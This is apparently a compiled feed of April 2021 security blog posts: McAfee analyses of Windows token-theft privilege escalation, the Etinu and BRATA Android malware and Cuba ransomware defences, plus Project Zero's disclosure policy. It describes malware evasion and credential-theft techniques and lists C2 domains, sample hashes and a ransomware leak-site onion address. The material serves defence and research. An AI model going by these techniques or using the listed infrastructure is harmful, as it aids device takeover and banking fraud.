Several types of malware and advanced persistent threats abuse process tokens to gain elevated privileges on the system. Malware can take multiple routes to achieve this goal. However, in all these routes, it would abuse the Windows APIs to execute the token stealing or token impersonation to gain elevated privileges and advance its lateral movement activities.

  • If the current logged on user on the compromised or infected machine is a part of the administrator group of users OR running a process with higher privileges (e.g., by using “runas” command), malware can abuse the privileges of the process’s access token to elevate its privileges on the system, thereby enabling itself to perform privileged tasks.
  • Malware can use multiple Windows APIs to enumerate the Windows processes running with higher privileges (usually SYSTEM level privileges), acquire the access tokens of those processes and start new processes with the acquired token. This results in the new process being started in the context of the user represented by the token, which is SYSTEM.
  • Malware can also execute a token impersonation attack where it can duplicate the access tokens of the higher privileged SYSTEM level process, convert it into the impersonation token by using appropriate Windows functionality and then impersonate the SYSTEM user on the infected machine, thereby elevating its privileges.
  • These token manipulation attacks will allow malware to use the credentials of the current logged on user or the credentials of another privileged user to authenticate to the remote network resource, leading to advancement of its lateral movement activities.
  • These attack techniques allows malware to bypass multiple mitigations like UAC, access control lists, heuristics detection techniques and allowing malware to remain stealthier while moving laterally inside the network.

 

Access Token Theft and Manipulation Attacks – Technical Analysis

Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation.

Read Now

 

The post Access Token Theft and Manipulation Attacks – A Door to Local Privilege Escalation appeared first on McAfee Blog.

Clever Billing Fraud Applications on Google Play: Etinu

19 April 2021 at 21:42
Saibāsekyuriti

Authored by: Sang Ryol Ryu and Chanung Pak

A new wave of fraudulent apps has made its way to the Google Play store, targeting Android users in Southwest Asia and the Arabian Peninsula as well—to the tune of more than 700,000 downloads before detection by McAfee Mobile Research and co-operation with Google to remove the apps.

Figure 1. Infected Apps on Google Play

Posing as photo editors, wallpapers, puzzles, keyboard skins, and other camera-related apps, the malware embedded in these fraudulent apps hijack SMS message notifications and then make unauthorized purchases. While apps go through a review process to ensure that they are legitimate, these fraudulent apps made their way into the store by submitting a clean version of the app for review and then introducing the malicious code via updates to the app later.

Figure 2. Negative reviews on Google Play

McAfee Mobile Security detects this threat as Android/Etinu and alerts mobile users if they are present. The McAfee Mobile Research team continues to monitor this threat and is likewise continuing its co-operation with Google to remove these and other malicious applications on Google Play.

Technical analysis

In terms of details, the malware embedded in these apps takes advantage of dynamic code loading. Encrypted payloads of malware appear in the assets folder associated with the app, using names such as “cache.bin,” “settings.bin,” “data.droid,” or seemingly innocuous “.png” files, as illustrated below.

Figure 3. Encrypted resource sneaked into the assets folder

Figure 4. Decryption flow

The figure above shows the decryption flow. Firstly, the hidden malicious code in the main .apk opens “1.png” file in the assets folder, decrypts it to “loader.dex,” and then loads the dropped .dex. The “1.png” is encrypted using RC4 with the package name as the key. The first payload creates HTTP POST request to the C2 server.

Interestingly, this malware uses key management servers. It requests keys from the servers for the AES encrypted second payload, “2.png”. And the server returns the key as the “s” value of JSON. Also, this malware has self-update function. When the server responds “URL” value, the content in the URL is used instead of “2.png”. However, servers do not always respond to the request or return the secret key.

Figure 5. Updated payload response

As always, the most malicious functions reveal themselves in the final stage. The malware hijacks the Notification Listener to steal incoming SMS messages like Android Joker malware does, without the SMS read permission. Like a chain system, the malware then passes the notification object to the final stage. When the notification has arisen from the default SMS package, the message is finally sent out using WebView JavaScript Interface.

Figure 6. Notification delivery flow

As a result of our additional investigation on C2 servers, following information was found, including carrier, phone number, SMS message, IP address, country, network status, and so forth—along with auto-renewing subscriptions:

Figure 7. Leaked data

Further threats like these to come?

We expect that threats which take advantage of Notification Listener will continue to flourish. The McAfee Mobile Research team continues to monitor these threats and protect customers by analyzing potential malware and working with app stores to remove it. Further, using McAfee Mobile Security can detect such threats and protect you from them via its regular updates. However, it’s important to pay attention to apps that request SMS-related permissions and Notification Listener permissions. Simply put, legitimate photo and wallpaper apps simply won’t ask for those because they’re not necessary for such apps to run. If a request seems suspicious, don’t allow it.

Technical Data and IOCs

MITRE ATT&CK Matrix

IoCs

08C4F705D5A7C9DC7C05EDEE3FCAD12F345A6EE6832D54B758E57394292BA651 com.studio.keypaper2021
CC2DEFEF5A14F9B4B9F27CC9F5BBB0D2FC8A729A2F4EBA20010E81A362D5560C com.pip.editor.camera
007587C4A84D18592BF4EF7AD828D5AAA7D50CADBBF8B0892590DB48CCA7487E org.my.favorites.up.keypaper
08FA33BC138FE4835C15E45D1C1D5A81094E156EEF28D02EA8910D5F8E44D4B8 com.super.color.hairdryer
9E688A36F02DD1B1A9AE4A5C94C1335B14D1B0B1C8901EC8C986B4390E95E760 com.ce1ab3.app.photo.editor
018B705E8577F065AC6F0EDE5A8A1622820B6AEAC77D0284852CEAECF8D8460C com.hit.camera.pip
0E2ACCFA47B782B062CC324704C1F999796F5045D9753423CF7238FE4CABBFA8 com.daynight.keyboard.wallpaper
50D498755486D3739BE5D2292A51C7C3D0ADA6D1A37C89B669A601A324794B06 com.super.star.ringtones

URLs

d37i64jgpubcy4.cloudfront.net

d1ag96m0hzoks5.cloudfront.net

dospxvsfnk8s8.cloudfront.net

d45wejayb5ly8.cloudfront.net

d3u41fvcv6mjph.cloudfront.net

d3puvb2n8wcn2r.cloudfront.net

d8fkjd2z9mouq.cloudfront.net

d22g8hm4svq46j.cloudfront.net

d3i3wvt6f8lwyr.cloudfront.net

d1w5drh895wnkz.cloudfront.net

The post Clever Billing Fraud Applications on Google Play: Etinu appeared first on McAfee Blog.

Policy and Disclosure: 2021 Edition

By: Ryan
15 April 2021 at 16:02

Posted by Tim Willis, Project Zero

At Project Zero, we spend a lot of time discussing and evaluating vulnerability disclosure policies and their consequences for users, vendors, fellow security researchers, and software security norms of the broader industry. We aim to be a vulnerability research team that benefits everyone, working across the entire ecosystem to help make 0-day hard.

 

We remain committed to adapting our policies and practices to best achieve our mission,  demonstrating this commitment at the beginning of last year with our 2020 Policy and Disclosure Trial.

As part of our annual year-end review, we evaluated our policy goals, solicited input from those that receive most of our reports, and adjusted our approach for 2021.

Summary of changes for 2021

Starting today, we're changing our Disclosure Policy to refocus on reducing the time it takes for vulnerabilities to get fixed, improving the current industry benchmarks on disclosure timeframes, as well as changing when we release technical details.

The short version: Project Zero won't share technical details of a vulnerability for 30 days if a vendor patches it before the 90-day or 7-day deadline. The 30-day period is intended for user patch adoption.

The full list of changes for 2021:

2020 Trial ("Full 90")

2021 Trial ("90+30")

  1. Public disclosure occurs 90 days after an initial vulnerability report, regardless of when the bug is fixed. Technical details (initial report plus any additional work) are published on Day 90. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 90 days. If an issue remains unpatched after 90 days, technical details are published immediately. If the issue is fixed within 90 days, technical details are published 30 days after the fix. A 14-day grace period* is allowed.
            
    Earlier disclosure with mutual agreement.
  1. For vulnerabilities that were actively exploited in-the-wild against users, public disclosure occurred 7 days after the initial vulnerability report, regardless of when the bug is fixed.




    In-the wild vulnerabilities are not offered a grace period
    *

    Earlier disclosure with mutual agreement.
  1. Disclosure deadline of 7 days for issues that are being actively exploited in-the-wild against users. If an issue remains unpatched after 7 days, technical details are published immediately. If the issue is fixed within 7 days, technical details are published 30 days after the fix.

    Vendors can request a 3-day grace period* for in-the-wild bugs.

    Earlier disclosure with mutual agreement.
  1. Technical details are immediately published when a vulnerability is patched in the grace period*.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 100)
  1. If a grace period* is granted, it uses up a portion of the 30-day patch adoption period.

    (e.g. Patched on Day 100 in grace period, disclosure on Day 120)

Elements of the 2020 trial that will carry over to 2021:

2020 Trial + 2021 Trial

1. Policy goals:

  • Faster patch development
  • Thorough patch development
  • Improved patch adoption

2. If Project Zero discovers a variant of a previously reported Project Zero bug, technical details of the variant will be added to the existing Project Zero report (which may be already public) and the report will not receive a new deadline.

3. If a 90-day deadline is missed, technical details are made public on Day 90, unless a grace period* is requested and confirmed prior to deadline expiry.

4. If a 7-day deadline is missed, technical details are made public on Day 7, unless a grace period* is requested and confirmed prior to deadline expiry.

* The grace period is an additional 14 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 90 days, but do expect it to be fixed within 104 days. Grace periods will not be granted for vulnerabilities that are expected to take longer than 104 days to fix.  For vulnerabilities that are being actively exploited and reported under the 7 day deadline, the grace period is an additional 3 days that a vendor can request if they do not expect that a reported vulnerability will be fixed within 7 days, but do expect it to be fixed within 10 days.

Rationale on changes for 2021

As we discussed in last year's "Policy and Disclosure: 2020 Edition", our three vulnerability disclosure policy goals are:

  1. Faster patch development: shorten the time between a bug report and a fix being available for users.
  2. Thorough patch development: ensure that each fix is correct and comprehensive.
  3. Improved patch adoption: shorten the time between a patch being released and users installing it.

Our policy trial for 2020 aimed to balance all three of these goals, while keeping our policy consistent, simple, and fair. Vendors were given 90 days to work on the full cycle of patch development and patch adoption. The idea was if a vendor wanted more time for users to install a patch, they would prioritize shipping the fix earlier in the 90 day cycle rather than later.

In practice however, we didn't observe a significant shift in patch development timelines, and we continued to receive feedback from vendors that they were concerned about publicly releasing technical details about vulnerabilities and exploits before most users had installed the patch. In other words, the implied timeline for patch adoption wasn't clearly understood.

The goal of our 2021 policy update is to make the patch adoption timeline an explicit part of our vulnerability disclosure policy. Vendors will now have 90 days for patch development, and an additional 30 days for patch adoption.

This 90+30 policy gives vendors more time than our current policy, as jumping straight to a 60+30 policy (or similar) would likely be too abrupt and disruptive. Our preference is to choose a starting point that can be consistently met by most vendors, and then gradually lower both patch development and patch adoption timelines.

For example, based on our current data tracking vulnerability patch times, it's likely that we can move to a "84+28" model for 2022 (having deadlines evenly divisible by 7 significantly reduces the chance our deadlines fall on a weekend). Beyond that, we will keep a close eye on the data and continue to encourage innovation and investment in bug triage, patch development, testing, and update infrastructure.

Risk and benefits

Much of the debate around vulnerability disclosure is caught up on the issue of whether rapidly releasing technical details benefits attackers or defenders more. From our time in the defensive community, we've seen firsthand how the open and timely sharing of technical details helps protect users across the Internet. But we also have listened to the concerns from others around the much more visible "opportunistic" attacks that may come from quickly releasing technical details.

We continue to believe that the benefits to the defensive community of Project Zero's publications outweigh the risks of disclosure, but we're willing to incorporate feedback into our policy in the interests of getting the best possible results for user security. Security researchers need to be able to work closely with vendors and open source projects on a range of technical, process, and policy issues -- and heated discussions about the risk and benefits of technical vulnerability details or proof-of-concept exploits has been a significant roadblock.

While the 90+30 policy will be a slight regression from the perspective of rapidly releasing technical details, we're also signaling our intent to shorten our 90-day disclosure deadline in the near future. We anticipate slowly reducing time-to-patch and speeding up patch adoption over the coming years until a steady state is reached.

Finally, we understand that this change will make it more difficult for the defensive community to quickly perform their own risk assessment, prioritize patch deployment, test patch efficacy, quickly find variants, deploy available mitigations, and develop detection signatures. We're always interested in hearing about Project Zero's publications being used for defensive purposes, and we encourage users to ask their vendors/suppliers for actionable technical details to be shared in security advisories.

Conclusion

Moving to a "90+30" model allows us to decouple time to patch from patch adoption time, reduce the contentious debate around attacker/defender trade-offs and the sharing of technical details, while advocating to reduce the amount of time that end users are vulnerable to known attacks.

Disclosure policy is a complex topic with many trade-offs to be made, and this wasn't an easy decision to make. We are optimistic that our 2021 policy and disclosure trial lays a good foundation for the future, and has a balance of incentives that will lead to positive improvements to user security.

Exploiting System Mechanic Driver

By: voidsec
14 April 2021 at 13:30

Last month we (last & VoidSec) took the amazing Windows Kernel Exploitation Advanced course from Ashfaq Ansari (@HackSysTeam) at NULLCON. The course was very interesting and covered core kernel space concepts as well as advanced mitigation bypasses and exploitation. There was also a nice CTF and its last exercise was: “Write an exploit for System […]

The post Exploiting System Mechanic Driver appeared first on VoidSec.

McAfee Labs Report Reveals Latest COVID-19 Threats and Malware Surges

13 April 2021 at 04:01

The McAfee Advanced Threat Research team today published the McAfee Labs Threats Report: April 2021.

In this edition, we present new findings in our traditional threat statistical categories – as well as our usual malware, sectors, and vectors – imparted in a new, enhanced digital presentation that’s more easily consumed and interpreted.

Historically, our reports detailed the volume of key threats, such as “what is in the malware zoo.” The introduction of MVISION Insights in 2020 has since made it possible to track the prevalence of campaigns, as well as, their associated IoCs, and determine the in-field detections. This latest report incorporates not only the malware zoo but new analysis for what is being detected in the wild.

The Q3 and Q4 2020 findings include:

  • COVID-19-themed cyber-attack detections increased 114%
  • New malware samples averaging 648 new threats per minute
  • 1 million external attacks observed against MVISION Cloud user accounts
  • Powershell threats spiked 208%
  • Mobile malware surged 118%

Additional Q3 and Q4 2020 content includes:

  • Leading MITRE ATT&CK techniques
  • Prominent exploit vulnerabilities
  • McAfee research of the prolific SUNBURST/SolarWinds campaign

These new, insightful additions really make for a bumper report! We hope you find this new McAfee Labs threat report presentation and data valuable.

Don’t forget keep track of the latest campaigns and continuing threat coverage by visiting our McAfee COVID-19 Threats Dashboard and the MVISION Insights preview dashboard.

The post McAfee Labs Report Reveals Latest COVID-19 Threats and Malware Surges appeared first on McAfee Blog.

BRATA Keeps Sneaking into Google Play, Now Targeting USA and Spain

12 April 2021 at 16:13
How to check for viruses

Recently, the McAfee Mobile Research Team uncovered several new variants of the Android malware family BRATA being distributed in Google Play, ironically posing as app security scanners.

These malicious apps urge users to update Chrome, WhatsApp, or a PDF reader, yet instead of updating the app in question, they take full control of the device by abusing accessibility services. Recent versions of BRATA were also seen serving phishing webpages targeting users of financial entities, not only in Brazil but also in Spain and the USA.

In this blog post we will provide an overview of this threat, how does this malware operates and its main upgrades compared with earlier versions. If you want to learn more about the technical details of this threat and the differences between all variants you can check the BRATA whitepaper here.

The origins of BRATA

First seen in the wild at the end of 2018 and named “Brazilian Remote Access Tool Android ” (BRATA) by Kaspersky, this “RAT” initially targeted users in Brazil and then rapidly evolved into a banking trojan. It combines full device control capabilities with the ability to display phishing webpages that steal banking credentials in addition to abilities that allow it capture screen lock credentials (PIN, Password or Pattern), capture keystrokes (keylogger functionality), and record the screen of the infected device to monitor a user’s actions without their consent.

Because BRATA is distributed mainly on Google Play, it allows bad actors to lure victims into installing these malicious apps pretending that there is a security issue on the victim’s device and asking to install a malicious app to fix the problem. Given this common ruse, it is recommended to avoid clicking on links from untrusted sources that pretend to be a security software which scans and updates your system—e even if that link leads to an app in Google Play. McAfee offers protection against this threat via McAfee Mobile Security, which detects this malware as Android/Brata.

How BRATA Android malware has evolved and targets new victims

The main upgrades and changes that we have identified in the latest versions of BRATA recently found in Google Play include:

  • Geographical expansion: Initially targeting Brazil, we found that recent variants started to also target users in Spain and the USA.
  • Banking trojan functionality: In addition to being able to have full control of the infected device by abusing accessibility services, BRATA is now serving phishing URLs based on the presence of certain financial and banking apps defined by the remote command and control server.
  • Self-defense techniques: New BRATA variants added new protection layers like string obfuscation, encryption of configuration files, use of commercial packers, and the move of its core functionality to a remote server so it can be easily updated without changing the main application. Some BRATA variants also check first if the device is worth being attacked before downloading and executing their main payload, making it more evasive to automated analysis systems.

BRATA in Google Play

During 2020, the threat actors behind BRATA have managed to publish several apps in Google Play, most of them reaching between one thousand to five thousand installs. However, also a few variants have reached 10,000 installs including the latest one, DefenseScreen, reported to Google by McAfee in October and later removed from Google Play.

Figure 1. DefenseScreen app in Google Play.

From all BRATA apps that were in Google Play in 2020, five of them caught our attention as they have notable improvements compared with previous ones. We refer to them by the name of the developer accounts:

Figure 2. Timeline of identified apps in Google Play from May to October 2020

Social engineering tricks

BRATA poses as a security app scanner that pretends to scan all the installed apps, while in the background it checks if any of the target apps provided by a remote server are installed in the user’s device. If that is the case, it will urge the user to install a fake update of a specific app selected depending on the device language. In the case of English-language apps, BRATA suggests the update of Chrome while also constantly showing a notification at the top of the screen asking the user to activate accessibility services:

Figure 3. Fake app scanning functionality

Once the user clicks on “UPDATE NOW!”, BRATA proceeds to open the main Accessibility tab in Android settings and asks the user to manually find the malicious service and grant permissions to use accessibility services. When the user attempts to do this dangerous action, Android warns of the potential risks of granting access to accessibility services to a specific app, including that the app can observe your actions, retrieve content from Windows, and perform gestures like tap, swipe, and pinch.

As soon as the user clicks on OK the persistent notification goes away, the main icon of the app is hidden and a full black screen with the word “Updating” appears, which could be used to hide automated actions that now can be performed with the abuse of accessibility services:

Figure 4. BRATA asking access to accessibility services and showing a black screen to potentially hide automated actions

At this point, the app is completely hidden from the user, running in the background in constant communication with a command and control server run by the threat actors. The only user interface that we saw when we analyzed BRATA after the access to accessibility services was granted was the following screen, created by the malware to steal the device PIN and use it to unlock it when the phone is unattended. The screen asks the user to confirm the PIN, validating it with the real one because when an incorrect PIN is entered, an error message is shown and the screen will not disappear until the correct PIN is entered:

Figure 5. BRATA attempting to steal device PIN and confirming if the correct one is provided

BRATA capabilities

Once the malicious app is executed and accessibility permissions have been granted, BRATA can perform almost any action in the compromised device. Here’s the list of commands that we found in all the payloads that we have analyzed so far:

  • Steal lock screen (PIN/Password/Pattern)
  • Screen Capture: Records the device’s screen and sends screenshots to the remote server
  • Execute Action: Interact with user’s interface by abusing accessibility services
  • Unlock Device: Use stolen PIN/Password/Pattern to unlock the device
  • Start/Schedule activity lunch: Opens a specific activity provided by the remote server
  • Start/Stop Keylogger: Captures user’s input on editable fields and leaks that to a remote server
  • UI text injection: Injects a string provided by the remote server in an editable field
  • Hide/Unhide Incoming Calls: Sets the ring volume to 0 and creates a full black screen to hide an incoming call
  • Clipboard manipulation: Injects a string provided by the remote server in the clipboard

In addition to the commands above, BRATA also performs automated actions by abusing accessibility services to hide itself from the user or automatically grant privileges to itself:

  • Hides the media projection warning message that explicitly warns the user that the app will start capturing everything displayed on the screen.
  • Grants itself any permissions by clicking on the “Allow” button when the permission dialog appears in the screen.
  • Disables Google Play Store and therefore Google Play Protect.
  • Uninstalls itself in case that the Settings interface of itself with the buttons “Uninstall” and “Force Stop” appears in the screen.

Geographical expansion and Banking Trojan Functionality

Earlier BRATA versions like OutProtect and PrivacyTitan were designed to target Brazilian users only by limiting its execution to devices set to the Portuguese language in Brazil. However, in June we noticed that threat actors behind BRATA started to add support to other languages like Spanish and English. Depending on the language configured in the device, the malware suggested that one of the following three apps needed an urgent update: WhatsApp (Spanish), a non-existent PDF Reader (Portuguese) and Chrome (English):

Figure 6. Apps falsely asked to be updated depending on the device language

In addition to the localization of the user-interface strings, we also noticed that threat actors have updated the list of targeted financial apps to add some from Spain and USA. In September, the target list had around 52 apps but only 32 had phishing URLs. Also, from the 20 US banking apps present in the last target list only 5 had phishing URLs. Here’s an example of phishing websites that will be displayed to the user if specific US banking apps are present in the compromised device:

Figure 7. Examples of phishing websites pretending to be from US banks

Multiple Obfuscation Layers and Stages

Throughout 2020, BRATA constantly evolved, adding different obfuscation layers to impede its analysis and detection. One of the first major changes was moving its core functionality to a remote server so it can be easily updated without changing the original malicious application. The same server is used as a first point of contact to register the infected device, provide an updated list of targeted financial apps, and then deliver the IP address and port of the server that will be used by the attackers to execute commands remotely on the compromised device:

 

Figure 8. BRATA high level network communication

Additional protection layers include string obfuscation, country and language check, encryption of certain key strings in assets folder, and, in latest variants, the use of a commercial packer that further prevents the static and dynamic analysis of the malicious apps. The illustration below provides a summary of the different protection layers and execution stages present in the latest BRATA variants:

Figure 9. BRATA protection layers and execution stages

Prevention and defense

In order get infected with BRATA ,users must install the malicious application from Google Play so below are some recommendations to avoid being tricked by this or any other Android threats that use social engineering to convince users to install malware that looks legitimate:

  • Don’t trust an Android application just because it’s available in the official store. In this case, victims are mainly lured to install an app that promises a more secure device by offering a fake update. Keep in mind that in Android updates are installed automatically via Google Play so users shouldn’t require the installation of a third-party app to have the device up to date.
  • McAfee Mobile Security will alert users if they are attempting to install or execute a malware even if it’s downloaded from Google Play. We recommend users to have a reliable and updated antivirus installed on their mobile devices to detect this and other malicious applications.
  • Do not click on suspicious links received from text messages or social media, particularly from unknown sources. Always double check by other means if a contact that sends a link without context was really sent by that person, because it could lead to the download of a malicious application.
  • Before installing an app, check the developer information, requested permissions, the number of installations, and the content of the reviews. Sometimes applications could have very good rating but most of the reviews could be fake, such as we uncovered in Android/LeifAccess. Be aware that ranking manipulation happens and that reviews are not always trustworthy.

The activation of accessibility services is very sensitive in Android and key to the successful execution of this banking trojan because, once the access to those services is granted, BRATA can perform all the malicious activities and take control of the device. For this reason, Android users must be very careful when granting this access to any app.

Accessibility services are so powerful that in hands of a malicious app they could be used to fully compromise your device data, your online banking and finances, and your digital life overall.

BRATA Android malware continues to evolve—another good reason for protecting mobile devices

When BRATA was initially discovered in 2019 and named “Brazilian Android RAT” by Kaspersky, it was said that, theoretically, the malware can be used to target other users if the cybercriminals behind this threat wanted to do it. Based on the newest variants found in 2020, the theory has become reality, showing that this threat is currently very active, constantly adding new targets, new languages and new protection layers to make its detection and analysis more difficult.

In terms of functionality, BRATA is just another example of how powerful the (ab)use of accessibility services is and how, with just a little bit of social engineering and persistence, cybercriminals can trick users into granting this access to a malicious app and basically getting total control of the infected device. By stealing the PIN, Password or Pattern, combined with the ability to record the screen, click on any button and intercept anything that is entered in an editable field, malware authors can virtually get any data they want, including banking credentials via phishing web pages or even directly from the apps themselves, while also hiding all these actions from the user.

Judging by our findings, the number of apps found in Google Play in 2020 and the increasing number of targeted financial apps, it looks like BRATA will continue to evolve, adding new functionality, new targets, and new obfuscation techniques to target as many users as possible, while also attempting to reduce the risk of being detected and removed from the Play store.

McAfee Mobile Security detects this threat as Android/Brata. To protect yourselves from this and similar threats, employ security software on your mobile devices and think twice before granting access to accessibility services to suspicious apps, even if they are downloaded from trusted sources like Google Play.

Appendix

Techniques, Tactics and Procedures (TTPS)

Figure 10. MITRE ATT&CK Mobile for BRATA

<h3>Indicators of compromise

Apps:

SHA256 Package Name Installs
4cdbd105ab8117620731630f8f89eb2e6110dbf6341df43712a0ec9837c5a9be com.outprotect.android 1,000+
d9bc87ab45b0c786aa09f964a8101f6df7ea76895e2e8438c13935a356d9116b com.privacytitan.android 1,000+
f9dc40a7dd2a875344721834e7d80bf7dbfa1bf08f29b7209deb0decad77e992 com.greatvault.mobile 10,000+
e00240f62ec68488ef9dfde705258b025c613a41760138b5d9bdb2fb59db4d5e com.pw.secureshield 5,000+
2846c9dda06a052049d89b1586cff21f44d1d28f153a2ff4726051ac27ca3ba7 com.defensescreen.application 10,000+

 

URLs:

  • bialub[.]com
  • brorne[.]com
  • jachof[.]com

 

Technical Analysis of BRATA Apps

This paper will analyze five different “Brazilian Remote Access Tool Android” (BRATA) apps found in Google Play during 2020.

View Now

The post BRATA Keeps Sneaking into Google Play, Now Targeting USA and Spain appeared first on McAfee Blog.

McAfee Defender’s Blog: Cuba Ransomware Campaign

6 April 2021 at 17:00

Cuba Ransomware Overview

Over the past year, we have seen ransomware attackers change the way they have responded to organizations that have either chosen to not pay the ransom or have recovered their data via some other means. At the end of the day, fighting ransomware has resulted in the bad actors’ loss of revenue. Being the creative bunch they are, they have resorted to data dissemination if the ransom is not paid. This means that significant exposure could still exist for your organization, even if you were able to recover from the attack.

Cuba ransomware, no newcomer to the game, has recently introduced this behavior.

This blog is focused on how to build an adaptable security architecture to increase your resilience against these types of attacks and specifically, how McAfee’s portfolio delivers the capability to prevent, detect and respond against the tactics and techniques used in the Cuba Ransomware Campaign.

Gathering Intelligence on Cuba Ransomware

As always, building adaptable defensive architecture starts with intelligence. In most organizations, the Security Operations team is responsible for threat intelligence analysis, as well as threat and incident response. McAfee Insights (https://www.mcafee.com/enterprise/en-us/lp/insights-dashboard1.html#) is a great tool for the threat intel analyst and threat responder. The Insights Dashboard identifies prevalence and severity of emerging threats across the globe which enables the Security Operations Center (SOC) to prioritize threat response actions and gather relevant cyber threat intelligence (CTI) associated with the threat, in this case the Cuba ransomware campaign. The CTI is provided in the form of technical indicators of compromise (IOCs) as well as MITRE ATT&CK framework tactics and techniques. As a threat intel analyst or responder you can drill down to gather more specific information on Cuba ransomware, such as prevalence and links to other sources of information. You can further drill down to gather more specific actionable intelligence such as indicators of compromise and tactics/techniques aligned to the MITRE ATT&CK framework.

From the McAfee Advanced Threat Research (ATR) blog, you can see that Cuba ransomware leverages tactics and techniques common to other APT campaigns. Currently, the Initial Access vector is not known. It could very well be spear phishing, exploited system tools and signed binaries, or a multitude of other popular methods.

Defensive Architecture Overview

Today’s digital enterprise is a hybrid environment of on-premise systems and cloud services with multiple entry points for attacks like Cuba ransomware. The work from home operating model forced by COVID-19 has only expanded the attack surface and increased risk for successful spear phishing attacks if organizations did not adapt their security posture and increase training for remote workers. Mitigating the risk of attacks like Cuba ransomware requires a security architecture with the right controls at the device, on the network and in security operations (SecOps). The Center for Internet Security (CIS) Top 20 Cyber Security Controls provides a good guide to build that architecture. As indicated earlier, the exact entry vector used by Cuba ransomware is currently unknown, so what follows, here, are more generalized recommendations for protecting your enterprise.

Initial Access Stage Defensive Overview

According to Threat Intelligence and Research, the initial access for Cuba ransomware is not currently known. As attackers can leverage many popular techniques for initial access, it is best to validate efficacy on all layers of defenses. This includes user awareness training and response procedures, intelligence and behavior-based malware defenses on email systems, web proxy and endpoint systems, and finally SecOps playbooks for early detection and response against suspicious email attachments or other phishing techniques. The following chart summarizes the controls expected to have the most effect against initial stage techniques and the McAfee solutions to implement those controls where applicable.

MITRE Tactic MITRE Techniques CSC Controls McAfee Capability
Initial Access Spear Phishing Attachments (T1566.001) CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

Initial Access Spear Phishing Link (T1566.002) CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

Initial Access Spear Phishing (T1566.003) Service CSC 7 – Email and Web Browser Protection

CSC 8 – Malware Defenses

CSC 17 – User Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection,

Web Gateway (MWG), Advanced Threat Defense, Web Gateway Cloud Service (WGCS)

For additional information on how McAfee can protect against suspicious email attachments, review this additional blog post: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-protects-against-suspicious-email-attachments/

Exploitation Stage Defensive Overview

The exploitation stage is where the attacker gains access to the target system. Protection against Cuba ransomware at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, restriction of application execution, and security operations tools like endpoint detection and response sensors.

McAfee Endpoint Security 10.7 provides a defense in depth capability, including signatures and threat intelligence, to cover known bad indicators or programs, as well as machine-learning and behavior-based protection to reduce the attack surface against Cuba ransomware and detect new exploitation attack techniques. If the initial entry vector is a weaponized Word document with links to external template files on a remote server, for example, McAfee Threat Prevention and Adaptive Threat Protection modules protect against these techniques.

The following chart summarizes the critical security controls expected to have the most effect against exploitation stage techniques and the McAfee solutions to implement those controls where applicable.

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Execution User Execution (T1204) CSC 5 Secure Configuration

CSC 8 Malware Defenses

CSC 17 Security Awareness

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), Web Gateway and Network Security Platform
Execution Command and Scripting Interpreter (T1059)

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC), MVISION EDR
Execution Shared Modules (T1129) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control (MAC)
Persistence Boot or Autologon Execution (T1547) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7 Threat Prevention, MVISION EDR
Defensive Evasion Template Injection (T1221) CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR
Defensive Evasion Signed Binary Proxy Execution (T1218) CSC 4 Control Admin Privileges

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, Application Control, MVISION EDR
Defensive Evasion Deobfuscate/Decode Files or Information (T1027)

 

CSC 5 Secure Configuration

CSC 8 Malware Defenses

Endpoint Security Platform 10.7, Threat Prevention, Adaptive Threat Protection, MVISION EDR

For more information on how McAfee Endpoint Security 10.7 can prevent some of the techniques used in the Cuba ransomware exploit stage, review this additional blog post: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-amsi-integration-protects-against-malicious-scripts/

Impact Stage Defensive Overview

The impact stage is where the attacker encrypts the target system, data and perhaps moves laterally to other systems on the network. Protection at this stage is heavily dependent on adaptable anti-malware on both end user devices and servers, network controls and security operation’s capability to monitor logs for anomalies in privileged access or network traffic. The following chart summarizes the controls expected to have the most effect against impact stage techniques and the McAfee solutions to implement those controls where applicable:

The public leak site of Cuba ransomware can be found via TOR: http://cuba4mp6ximo2zlo[.]onion/

MITRE Tactic MITRE Techniques CSC Controls McAfee Portfolio Mitigation
Discovery Account Discovery (T1087) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery System Information Discovery (T1082) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Discovery System Owner/User Discovery (T1033) CSC 4 Control Use of Admin Privileges

CSC 5 Secure Configuration

CSC 6 Log Analysis

MVISION EDR, MVISION Cloud, Cloud Workload Protection
Command and Control Encrypted Channel (T1573) CSC 8 Malware Defenses

CSC 12 Boundary Defenses

Web Gateway, Network Security Platform

 

Hunting for Cuba Ransomware Indicators

